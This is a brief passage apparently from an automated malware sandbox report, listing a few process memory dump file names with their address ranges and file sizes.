
                                                                                                                                                                          Filesize

                                                                                                                                                                          444KB

                                                                                                                                                                        • memory/3048-3418-0x0000000000400000-0x000000000046F000-memory.dmp

                                                                                                                                                                          Filesize

                                                                                                                                                                          444KB

                                                                                                                                                                        • memory/3056-274-0x00000000003B0000-0x00000000003B8000-memory.dmp

                                                                                                                                                                          Filesize

                                                                                                                                                                          32KB